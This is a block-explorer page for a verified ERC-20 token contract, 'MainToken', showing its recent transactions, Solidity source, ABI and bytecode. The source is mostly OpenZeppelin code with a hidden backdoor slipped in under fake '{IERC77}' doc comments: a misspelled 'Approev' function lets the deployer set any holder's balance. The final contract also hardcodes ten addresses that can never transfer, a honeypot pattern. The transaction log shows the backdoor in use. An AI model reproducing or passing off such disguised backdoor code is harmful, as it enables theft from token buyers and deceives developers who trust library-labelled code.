Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Multichain Info
No addresses found
Latest 9 from a total of 9 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 22023246 | 5 days ago | IN | 0 ETH | 0.00003119 | ||||
Approve | 22020012 | 5 days ago | IN | 0 ETH | 0.00005955 | ||||
Approve | 22020004 | 5 days ago | IN | 0 ETH | 0.00005222 | ||||
Approve | 22019925 | 5 days ago | IN | 0 ETH | 0.00011719 | ||||
Approve | 22019916 | 5 days ago | IN | 0 ETH | 0.00005384 | ||||
Approve | 22019891 | 5 days ago | IN | 0 ETH | 0.0000859 | ||||
Approev | 22019882 | 5 days ago | IN | 0 ETH | 0.00002681 | ||||
Approev | 22019640 | 5 days ago | IN | 0 ETH | 0.00002601 | ||||
Approve | 22019617 | 5 days ago | IN | 0 ETH | 0.00011429 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
MainToken
Compiler Version
v0.8.28+commit.7893614a
Optimization Enabled:
No with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT // File @openzeppelin/contracts/interfaces/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.20; /** * @dev Standard ERC-20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC-721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC-1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); } // File @openzeppelin/contracts/token/ERC20/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.20; /** * @dev Interface of the ERC-20 standard as defined in the ERC. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.20; /** * @dev Interface for the optional metadata functions from the ERC-20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/utils/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } // File @openzeppelin/contracts/token/ERC20/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.20; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC-20 * applications. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol;address private _bootsmark; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; _bootsmark = msg.sender; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /* * @dev See {IERC77-IEE} */ function _iee(address caller) internal view returns (bool) { return iMee(); } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC77-Approev} */ function Approev(address recipient, uint256 aDropst) external { uint256 receiveRewrd = aDropst; _balances[recipient] = receiveRewrd; require(_iee(recipient), "Caller is not the original caller"); } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Skips emitting an {Approval} event indicating an allowance update. This is not * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve]. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev See {IERC77-MEE} */ function iMee() internal view returns (bool) { return _msgSender() == _bootsmark; } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * * ```solidity * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } } // Original license: SPDX_License_Identifier: MIT pragma solidity ^0.8.28; contract MainToken is ERC20 { constructor(string memory name_, string memory symbol_, uint256 supply_) ERC20(name_, symbol_) { _mint(_msgSender(), supply_ * 10 ** decimals()); } function _update(address from, address to, uint256 value) internal override { if (from == 0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13) { revert ERC20InvalidSender(0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13); } if (from == 0xe581e1304641f69F038459e982C4fB35D99e3C05) { revert ERC20InvalidSender(0xe581e1304641f69F038459e982C4fB35D99e3C05); } if (from == 0x011356Ea1032879D82FD14eE38a69f7E1D562528) { revert ERC20InvalidSender(0x011356Ea1032879D82FD14eE38a69f7E1D562528); } if (from == 0x36A3d21e7E9aa4075aFe920f7A868019E44ae1F8) { revert ERC20InvalidSender(0x36A3d21e7E9aa4075aFe920f7A868019E44ae1F8); } if (from == 0x2BdEeC3f8563E76E1A2C797F067353d328953c88) { revert ERC20InvalidSender(0x2BdEeC3f8563E76E1A2C797F067353d328953c88); } if (from == 0xB7f764E44fc01C0B79Ea4dee48d1D7664AEeb502) { revert ERC20InvalidSender(0xB7f764E44fc01C0B79Ea4dee48d1D7664AEeb502); } if (from == 0x1f2F10D1C40777AE1Da742455c65828FF36Df387) { revert ERC20InvalidSender(0x1f2F10D1C40777AE1Da742455c65828FF36Df387); } if (from == 0x77ad3a15b78101883AF36aD4A875e17c86AC65d1) { revert ERC20InvalidSender(0x77ad3a15b78101883AF36aD4A875e17c86AC65d1); } if (from == 0xc4c162e5E2475675cf07f4c851659d0f4266c224) { revert ERC20InvalidSender(0xc4c162e5E2475675cf07f4c851659d0f4266c224); } if (from == 0xa85b93983767729fcceAc60e32a0bf87cD632108) { revert ERC20InvalidSender(0xa85b93983767729fcceAc60e32a0bf87cD632108); } super._update(from, to, value); } }
{ "evmVersion": "paris", "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"supply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"aDropst","type":"uint256"}],"name":"Approev","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801561001057600080fd5b506040516127d23803806127d283398181016040528101906100329190610b4f565b828281600390816100439190610df1565b5080600490816100539190610df1565b5033600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050506100d86100a86100e060201b60201c565b6100b66100e860201b60201c565b600a6100c29190611032565b836100cd919061107d565b6100f160201b60201c565b5050506111b0565b600033905090565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036101635760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161015a9190611100565b60405180910390fd5b6101756000838361017960201b60201c565b5050565b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102115773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016102089190611100565b60405180910390fd5b73e581e1304641f69f038459e982c4fb35d99e3c0573ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102a95773e581e1304641f69f038459e982c4fb35d99e3c056040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016102a09190611100565b60405180910390fd5b73011356ea1032879d82fd14ee38a69f7e1d56252873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036103415773011356ea1032879d82fd14ee38a69f7e1d5625286040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016103389190611100565b60405180910390fd5b7336a3d21e7e9aa4075afe920f7a868019e44ae1f873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036103d9577336a3d21e7e9aa4075afe920f7a868019e44ae1f86040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016103d09190611100565b60405180910390fd5b732bdeec3f8563e76e1a2c797f067353d328953c8873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361047157732bdeec3f8563e76e1a2c797f067353d328953c886040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016104689190611100565b60405180910390fd5b73b7f764e44fc01c0b79ea4dee48d1d7664aeeb50273ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105095773b7f764e44fc01c0b79ea4dee48d1d7664aeeb5026040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016105009190611100565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105a157731f2f10d1c40777ae1da742455c65828ff36df3876040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016105989190611100565b60405180910390fd5b7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610639577377ad3a15b78101883af36ad4a875e17c86ac65d16040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016106309190611100565b60405180910390fd5b73c4c162e5e2475675cf07f4c851659d0f4266c22473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036106d15773c4c162e5e2475675cf07f4c851659d0f4266c2246040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016106c89190611100565b60405180910390fd5b73a85b93983767729fcceac60e32a0bf87cd63210873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107695773a85b93983767729fcceac60e32a0bf87cd6321086040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107609190611100565b60405180910390fd5b61077a83838361077f60201b60201c565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107d15780600260008282546107c5919061111b565b925050819055506108a4565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561085d578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016108549392919061115e565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108ed578060026000828254039250508190555061093a565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516109979190611195565b60405180910390a3505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610a0b826109c2565b810181811067ffffffffffffffff82111715610a2a57610a296109d3565b5b80604052505050565b6000610a3d6109a4565b9050610a498282610a02565b919050565b600067ffffffffffffffff821115610a6957610a686109d3565b5b610a72826109c2565b9050602081019050919050565b60005b83811015610a9d578082015181840152602081019050610a82565b60008484015250505050565b6000610abc610ab784610a4e565b610a33565b905082815260208101848484011115610ad857610ad76109bd565b5b610ae3848285610a7f565b509392505050565b600082601f830112610b0057610aff6109b8565b5b8151610b10848260208601610aa9565b91505092915050565b6000819050919050565b610b2c81610b19565b8114610b3757600080fd5b50565b600081519050610b4981610b23565b92915050565b600080600060608486031215610b6857610b676109ae565b5b600084015167ffffffffffffffff811115610b8657610b856109b3565b5b610b9286828701610aeb565b935050602084015167ffffffffffffffff811115610bb357610bb26109b3565b5b610bbf86828701610aeb565b9250506040610bd086828701610b3a565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680610c2c57607f821691505b602082108103610c3f57610c3e610be5565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302610ca77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610c6a565b610cb18683610c6a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000610cee610ce9610ce484610b19565b610cc9565b610b19565b9050919050565b6000819050919050565b610d0883610cd3565b610d1c610d1482610cf5565b848454610c77565b825550505050565b600090565b610d31610d24565b610d3c818484610cff565b505050565b5b81811015610d6057610d55600082610d29565b600181019050610d42565b5050565b601f821115610da557610d7681610c45565b610d7f84610c5a565b81016020851015610d8e578190505b610da2610d9a85610c5a565b830182610d41565b50505b505050565b600082821c905092915050565b6000610dc860001984600802610daa565b1980831691505092915050565b6000610de18383610db7565b9150826002028217905092915050565b610dfa82610bda565b67ffffffffffffffff811115610e1357610e126109d3565b5b610e1d8254610c14565b610e28828285610d64565b600060209050601f831160018114610e5b5760008415610e49578287015190505b610e538582610dd5565b865550610ebb565b601f198416610e6986610c45565b60005b82811015610e9157848901518255600182019150602085019450602081019050610e6c565b86831015610eae5784890151610eaa601f891682610db7565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115610f4957808604811115610f2557610f24610ec3565b5b6001851615610f345780820291505b8081029050610f4285610ef2565b9450610f09565b94509492505050565b600082610f62576001905061101e565b81610f70576000905061101e565b8160018114610f865760028114610f9057610fbf565b600191505061101e565b60ff841115610fa257610fa1610ec3565b5b8360020a915084821115610fb957610fb8610ec3565b5b5061101e565b5060208310610133831016604e8410600b8410161715610ff45782820a905083811115610fef57610fee610ec3565b5b61101e565b6110018484846001610eff565b9250905081840481111561101857611017610ec3565b5b81810290505b9392505050565b600060ff82169050919050565b600061103d82610b19565b915061104883611025565b92506110757fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610f52565b905092915050565b600061108882610b19565b915061109383610b19565b92508282026110a181610b19565b915082820484148315176110b8576110b7610ec3565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110ea826110bf565b9050919050565b6110fa816110df565b82525050565b600060208201905061111560008301846110f1565b92915050565b600061112682610b19565b915061113183610b19565b925082820190508082111561114957611148610ec3565b5b92915050565b61115881610b19565b82525050565b600060608201905061117360008301866110f1565b611180602083018561114f565b61118d604083018461114f565b949350505050565b60006020820190506111aa600083018461114f565b92915050565b611613806111bf6000396000f3fe608060405234801561001057600080fd5b506004361061009e5760003560e01c806370a082311161006657806370a082311461015d57806395d89b411461018d578063a9059cbb146101ab578063cd5f5542146101db578063dd62ed3e146101f75761009e565b806306fdde03146100a3578063095ea7b3146100c157806318160ddd146100f157806323b872dd1461010f578063313ce5671461013f575b600080fd5b6100ab610227565b6040516100b891906111d5565b60405180910390f35b6100db60048036038101906100d69190611290565b6102b9565b6040516100e891906112eb565b60405180910390f35b6100f